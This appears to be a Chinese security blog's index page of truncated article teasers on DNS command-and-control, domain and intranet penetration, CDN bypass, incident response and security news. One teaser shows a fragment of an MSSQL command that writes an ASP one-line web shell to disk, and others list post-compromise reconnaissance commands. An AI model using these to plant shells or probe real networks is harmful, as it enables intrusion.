使用DNS进行命令控制(DNS-Shell)目录DNS隧道 利用DNS进行命令控制(DNS-Shell) &...
安全文章
安全文章
安全文章
域控攻防经验和笔记
拿到域网络后第一件事情就是收集域信息_ipconfig /all ------ 查询本机IP段,所在域等 net user ------ 本机用户列表 net localgroup administr...
安全工具
可在线查询子域名和同IP域名的RapidDNS
前言:https://RapidDNS.io 是一个秒级在线子域名和同IP域名的查询工具。目前拥有25亿条DNS记录,支持A、AAAA、CNAME、MX4种DNS记录类型。由于Goby程序对子域名收集...
安全闲碎
windows server 应急响应查表
日志审计查询安全日志: Get-WinEvent -FilterHashtable @{LogName='Security'}指定id查询: Get-WinEvent -LogNa...
安全博客
mysql数据库优化
mysql优化 **1. ** **避免使用 select * ** 你需要什么信息,就查询什么信息,查询的多了,查询的速度肯定就会慢
安全文章
绕过CDN寻找真实IP的8种方法
来自公众号:Bypass正常情况下,通过cmd命令可以快速找到域名对应IP,最常见的命令如ping、nslookup。但很多站点出于用户体验和安全的角度,使用CDN加速,将域名解析到CDN,这时候就需...
安全新闻
ALPHA威胁分析平台-武器库【邮件自动化检测】全新上线!
奇安信威胁情报中心的ALPHA威胁分析平台 - 威胁分析武器库,服务于安服、安运、安全分析师及各类企业用户。主要功能如下:失陷情报批量查询工具:针对办公网、DMZ服务器出站IP、域名、URL、批量自动...
安全文章
干货|内网渗透技术总结
0x01. 信息收集1.常见信息收集命令#ipconfig:ipconfig /all ------> 查询本机 IP 段,所在域等#net:net user ------> 本机用户列表...
云安全
【云原生安全】从分布式追踪看云原生应用安全
摘要在基于微服务的云原生架构中,客户端的一次服务调用,会产生包括服务和中间件在内的众多调用关系。对这些大量复杂的调用过程进行追踪,对于微服务的安全性分析、故障定位、以及性能提升等,有着重要的作用。一、...
安全新闻
快递公司有“内鬼”,河北永年警方破获贩卖公民个人信息案!
文章来源:安全学习那些事2020年10月28日,永年警方将快递公司“内鬼”任某抓获。一起贩卖公民个人信息案件成功告破。2020年8月份,永年区公安局接到某快递公司报警称,近期内部查询系统账号登录异常,...
安全文章
MSSQL把查询的东西写到文件中
当做另一种写shell的方式,或者导出数据的方法吧。exec sp_makewebtask 'c:wwwtestwri.asp','select''<%execute(request("SB")...
安全文章
红蓝演练之攻击溯源手段
攻击溯源的技术手段,主要包括ip定位、ID定位与攻击者定位。通过ip可定位攻击者所在位置,以及通过ip反查域名等手段,查询域名的注册信息,域名注册人及邮箱等信息。通过ID定位可获取攻击者常用的网络ID...
